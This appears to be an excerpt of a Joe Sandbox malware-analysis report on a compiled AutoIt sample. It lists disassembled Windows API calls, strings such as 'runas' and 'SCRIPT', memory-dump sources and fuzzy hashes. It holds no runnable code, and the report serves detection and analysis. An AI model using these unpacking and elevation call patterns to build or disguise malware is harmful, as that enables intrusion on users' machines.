                                                        • Part of subcall function 0081092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00803C14,008C52F8,?,?,?), ref: 0081096E
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00803C6F
                                                      • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,008B7770,00000010), ref: 0083D281
                                                      • SetCurrentDirectoryW.KERNEL32(?,008C52F8,?,?,?), ref: 0083D2B9
                                                      • GetForegroundWindow.USER32 ref: 0083D33F
                                                      • ShellExecuteW.SHELL32(00000000,?,?), ref: 0083D346
                                                        • Part of subcall function 00803A46: GetSysColorBrush.USER32(0000000F), ref: 00803A50
                                                        • Part of subcall function 00803A46: LoadCursorW.USER32(00000000,00007F00), ref: 00803A5F
                                                        • Part of subcall function 00803A46: LoadIconW.USER32(00000063), ref: 00803A76
                                                        • Part of subcall function 00803A46: LoadIconW.USER32(000000A4), ref: 00803A88
                                                        • Part of subcall function 00803A46: LoadIconW.USER32(000000A2), ref: 00803A9A
                                                        • Part of subcall function 00803A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00803AC0
                                                        • Part of subcall function 00803A46: RegisterClassExW.USER32(?), ref: 00803B16
                                                        • Part of subcall function 008039D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00803A03
                                                        • Part of subcall function 008039D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00803A24
                                                        • Part of subcall function 008039D5: ShowWindow.USER32(00000000), ref: 00803A38
                                                        • Part of subcall function 008039D5: ShowWindow.USER32(00000000), ref: 00803A41
                                                        • Part of subcall function 0080434A: _memset.LIBCMT ref: 00804370
                                                        • Part of subcall function 0080434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00804415
                                                      Strings
                                                      • This is a third-party compiled AutoIt script., xrefs: 0083D279
                                                      • runas, xrefs: 0083D33A
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                      • String ID: This is a third-party compiled AutoIt script.$runas
                                                      • API String ID: 529118366-3287110873
                                                      • Opcode ID: 881aeb4cb624599a38ac5a11ff0fc34f15cfe6d1864c405c9fad253070c973b2
                                                      • Instruction ID: 526d67c82e3ad8c2269c2bab4ea202bee51b4bfb3111791523cbb898509d9d0c
                                                      • Opcode Fuzzy Hash: 881aeb4cb624599a38ac5a11ff0fc34f15cfe6d1864c405c9fad253070c973b2
                                                      • Instruction Fuzzy Hash: 3A51E971D04248AEDF41EBB8EC05EED7BB9FF45744F004069F511E22E2DA746685CB22

                                                      Control-flow Graph

                                                      APIs
                                                      • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 008036D2
                                                      • KillTimer.USER32(?,00000001), ref: 008036FC
                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0080371F
                                                      • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 0080372A
                                                      • CreatePopupMenu.USER32 ref: 0080373E
                                                      • PostQuitMessage.USER32(00000000), ref: 0080374D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Timer$ClipboardCreateFormatKillMenuMessageNtdllPopupPostProc_QuitRegisterWindow
                                                      • String ID: TaskbarCreated
                                                      • API String ID: 157504867-2362178303
                                                      • Opcode ID: 4de6e7f00c72e4450c76551c6a101e2e2b06cda3022d2865c398587e96619072
                                                      • Instruction ID: fe3a5faf2a20ba4988e590dc7e2fa50805cad62103983cfbf500836ed913944e
                                                      • Opcode Fuzzy Hash: 4de6e7f00c72e4450c76551c6a101e2e2b06cda3022d2865c398587e96619072
                                                      • Instruction Fuzzy Hash: F44117B2100949ABDF546FACEC09F7A37ACFB55300F500135F702D62E2DB72A994A362

                                                      Control-flow Graph

                                                      APIs
                                                      • GetVersionExW.KERNEL32(?), ref: 008049CD
                                                        • Part of subcall function 00807BCC: _memmove.LIBCMT ref: 00807C06
                                                      • GetCurrentProcess.KERNEL32(?,0088FAEC,00000000,00000000,?), ref: 00804A9A
                                                      • IsWow64Process.KERNEL32(00000000), ref: 00804AA1
                                                      • GetNativeSystemInfo.KERNEL32(00000000), ref: 00804AE7
                                                      • FreeLibrary.KERNEL32(00000000), ref: 00804AF2
                                                      • GetSystemInfo.KERNEL32(00000000), ref: 00804B23
                                                      • GetSystemInfo.KERNEL32(00000000), ref: 00804B2F
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                      • String ID:
                                                      • API String ID: 1986165174-0
                                                      • Opcode ID: 2b13eedc42427100a2651d4111b78dba1e6a18e394a36ae45027ea82ce800c6b
                                                      • Instruction ID: b10d205ea033adba83fc8e67b2355fd11bf677c403082a6a9acb533dc0928d41
                                                      • Opcode Fuzzy Hash: 2b13eedc42427100a2651d4111b78dba1e6a18e394a36ae45027ea82ce800c6b
                                                      • Instruction Fuzzy Hash: F991C47198A7C4DECB71DB6898501AABFE5FF29300F444D6DD1C7D3A42D224B908C759

                                                      Control-flow Graph

                                                      Control-flow graph (rendered image not extracted): function at 00804E89; basic blocks call CreateStreamOnHGlobal, FindResourceExW, LoadResource, SizeofResource and LockResource.
                                                      APIs
                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00804E99
                                                      • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00804D8E,?,?,00000000,00000000), ref: 00804EB0
                                                      • LoadResource.KERNEL32(?,00000000,?,?,00804D8E,?,?,00000000,00000000,?,?,?,?,?,?,00804E2F), ref: 0083D937
                                                      • SizeofResource.KERNEL32(?,00000000,?,?,00804D8E,?,?,00000000,00000000,?,?,?,?,?,?,00804E2F), ref: 0083D94C
                                                      • LockResource.KERNEL32(00804D8E,?,?,00804D8E,?,?,00000000,00000000,?,?,?,?,?,?,00804E2F,00000000), ref: 0083D95F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                      • String ID: SCRIPT
                                                      • API String ID: 3051347437-3967369404
                                                      • Opcode ID: 55de499dc475b4460106081f6c5b39ae1c04153166979507db2a08a04a60d21c
                                                      • Instruction ID: 860dac924a498c71447fd27fa3966ea32e2ffa7db209795f2ff958c85ec12be7
                                                      • Opcode Fuzzy Hash: 55de499dc475b4460106081f6c5b39ae1c04153166979507db2a08a04a60d21c
                                                      • Instruction Fuzzy Hash: 3E115EB5240701BFD7218B69EC48F677BBAFBC5B21F204268F605C62A0DB61E8018660

                                                      Control-flow Graph

                                                      Control-flow graph (rendered image not extracted): function at 0094DA30-0094DC0A; basic blocks call LoadLibraryA, GetProcAddress, ExitProcess and VirtualProtect (twice).
                                                      APIs
                                                      • LoadLibraryA.KERNEL32(?), ref: 0094DB6A
                                                      • GetProcAddress.KERNEL32(?,00946FF9), ref: 0094DB88
                                                      • ExitProcess.KERNEL32(?,00946FF9), ref: 0094DB99
                                                      • VirtualProtect.KERNEL32(00800000,00001000,00000004,?,00000000), ref: 0094DBE7
                                                      • VirtualProtect.KERNEL32(00800000,00001000), ref: 0094DBFC
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                                      • String ID:
                                                      • API String ID: 1996367037-0
                                                      • Opcode ID: b7436e995b9c8e70598f0946611144cc021adbcca9762d7223e04ecd707ac2a8
                                                      • Instruction ID: c347d9334227ba5d02d404f107ade2795f54e71dea88e751bc0f8ca9c3946a1a
                                                      • Opcode Fuzzy Hash: b7436e995b9c8e70598f0946611144cc021adbcca9762d7223e04ecd707ac2a8
                                                      • Instruction Fuzzy Hash: 36513C76A4A3525BD7218EB8DCC0EB07798EB5233471D0B78C5E1C73C6E7A45806C760
                                                      APIs
                                                      • GetFileAttributesW.KERNEL32(?,0083E398), ref: 0086446A
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 0086447B
                                                      • FindClose.KERNEL32(00000000), ref: 0086448B
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: FileFind$AttributesCloseFirst
                                                      • String ID:
                                                      • API String ID: 48322524-0
                                                      • Opcode ID: c89d28e72d2b7a102e98dd6596aaf13cf82baea3eb4bb633f0acb8a2435857f0
                                                      • Instruction ID: e4ca996805886ad67bdd514928558976a7c6456fe2c7763fb1fbb7b1512c703e
                                                      • Opcode Fuzzy Hash: c89d28e72d2b7a102e98dd6596aaf13cf82baea3eb4bb633f0acb8a2435857f0
                                                      • Instruction Fuzzy Hash: C6E0D8324115046B42106B3CEC0E4ED775CFE45335F100715F935D11D0EB7499009799
                                                      APIs
                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00810A5B
                                                      • timeGetTime.WINMM ref: 00810D16
                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00810E53
                                                      • Sleep.KERNEL32(0000000A), ref: 00810E61
                                                      • LockWindowUpdate.USER32(00000000), ref: 00810EFA
                                                      • DestroyWindow.USER32 ref: 00810F06
                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00810F20
                                                      • Sleep.KERNEL32(0000000A,?,?), ref: 00844E83
                                                      • TranslateMessage.USER32(?), ref: 00845C60
                                                      • DispatchMessageW.USER32(?), ref: 00845C6E
                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00845C82
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                      • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                      • API String ID: 4212290369-3242690629
                                                      • Opcode ID: 47b7c3eb184a23fcb7a195a038fa7ea599b286982822a093bc7bea6a894c08f9
                                                      • Instruction ID: 53ff1a6e13dbc9cde6d57b4c288014216483280048ef92f8c3827699a7696c07
                                                      • Opcode Fuzzy Hash: 47b7c3eb184a23fcb7a195a038fa7ea599b286982822a093bc7bea6a894c08f9
                                                      • Instruction Fuzzy Hash: 92B27C70608745DFD724DB28C885BAEB7E5FF84304F14491DE59AD72A2DBB1E884CB82

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 00868F5F: __time64.LIBCMT ref: 00868F69
                                                        • Part of subcall function 00804EE5: _fseek.LIBCMT ref: 00804EFD
                                                      • __wsplitpath.LIBCMT ref: 00869234
                                                        • Part of subcall function 008240FB: __wsplitpath_helper.LIBCMT ref: 0082413B
                                                      • _wcscpy.LIBCMT ref: 00869247
                                                      • _wcscat.LIBCMT ref: 0086925A
                                                      • __wsplitpath.LIBCMT ref: 0086927F
                                                      • _wcscat.LIBCMT ref: 00869295
                                                      • _wcscat.LIBCMT ref: 008692A8
                                                        • Part of subcall function 00868FA5: _memmove.LIBCMT ref: 00868FDE
                                                        • Part of subcall function 00868FA5: _memmove.LIBCMT ref: 00868FED
                                                      • _wcscmp.LIBCMT ref: 008691EF
                                                        • Part of subcall function 00869734: _wcscmp.LIBCMT ref: 00869824
                                                        • Part of subcall function 00869734: _wcscmp.LIBCMT ref: 00869837
                                                      • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00869452
                                                      • _wcsncpy.LIBCMT ref: 008694C5
                                                      • DeleteFileW.KERNEL32(?,?), ref: 008694FB
                                                      • CopyFileW.KERNEL32(?,?,00000000), ref: 00869511
                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00869522
                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00869534
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                      • String ID:
                                                      • API String ID: 1500180987-0
                                                      • Opcode ID: 5cabd7135b67a0cdca25aaf92a1012929676c6178554f07901f39f5fc551643b
                                                      • Instruction ID: af5f26c0921689228149e57d3835c5e33c89ff76a4ef47882f20c4e9bc60c898
                                                      • Opcode Fuzzy Hash: 5cabd7135b67a0cdca25aaf92a1012929676c6178554f07901f39f5fc551643b
                                                      • Instruction Fuzzy Hash: 7CC11EB1D00229AADF11DF99DC85ADEB7BDFF45310F0040A6F609E7291DB309A858F66

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 00804706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,008C52F8,?,008037AE,?), ref: 00804724
                                                        • Part of subcall function 0082050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00807165), ref: 0082052D
                                                      • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 008071A8
                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0083E8C8
                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0083E909
                                                      • RegCloseKey.ADVAPI32(?), ref: 0083E947
                                                      • _wcscat.LIBCMT ref: 0083E9A0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                      • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                      • API String ID: 2673923337-2727554177
                                                      • Opcode ID: 15dbde8303ec0f3bec7426e14bd582497d75c8a1226ab6bdf4f4a28974a70d31
                                                      • Instruction ID: a35a6896d32fa26a3efa252a941fb66170c50cb3e46c985e35790262c7c72aa5
                                                      • Opcode Fuzzy Hash: 15dbde8303ec0f3bec7426e14bd582497d75c8a1226ab6bdf4f4a28974a70d31
                                                      • Instruction Fuzzy Hash: D9714871508311AEC714EF69EC81DABBBB8FF94310F40492EF545C72A1EB71A958CB92

                                                      Control-flow Graph

                                                      APIs
                                                      • GetSysColorBrush.USER32(0000000F), ref: 00803A50
                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00803A5F
                                                      • LoadIconW.USER32(00000063), ref: 00803A76
                                                      • LoadIconW.USER32(000000A4), ref: 00803A88
                                                      • LoadIconW.USER32(000000A2), ref: 00803A9A
                                                      • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00803AC0
                                                      • RegisterClassExW.USER32(?), ref: 00803B16
                                                        • Part of subcall function 00803041: GetSysColorBrush.USER32(0000000F), ref: 00803074
                                                        • Part of subcall function 00803041: RegisterClassExW.USER32(00000030), ref: 0080309E
                                                        • Part of subcall function 00803041: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 008030AF
                                                        • Part of subcall function 00803041: LoadIconW.USER32(000000A9), ref: 008030F2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
                                                      • String ID: #$0$AutoIt v3
                                                      • API String ID: 2880975755-4155596026
                                                      • Opcode ID: 551e4427c51bfbb63d255da424e8cd4f39a992aacc2ded7b211ef15c7a856e1b
                                                      • Instruction ID: 30c2dad571cf4e43a730b143ee52cfaa34911255dd7b9b15eb18b268b5452784
                                                      • Opcode Fuzzy Hash: 551e4427c51bfbb63d255da424e8cd4f39a992aacc2ded7b211ef15c7a856e1b
                                                      • Instruction Fuzzy Hash: 64214671D00708AFEF10DFA8EC09F9D7BF5FB08711F10012AE600AA2A2D3B566908F84

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                      • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                                      • API String ID: 1825951767-3513169116
                                                      • Opcode ID: 92f15d66ff5e737773f21e0e0311c14d199f44ba789ed7f20f6e91794749368a
                                                      • Instruction ID: 4374bf16f3cdc2da117fc866962a2cddddf7980903495d5a36e3003e58e15ba1
                                                      • Opcode Fuzzy Hash: 92f15d66ff5e737773f21e0e0311c14d199f44ba789ed7f20f6e91794749368a
                                                      • Instruction Fuzzy Hash: D3A14C7290022D9ACF45EBA8DC91EEEB778FF15310F000529E516E71D2DF746A48CBA1

                                                      Control-flow Graph

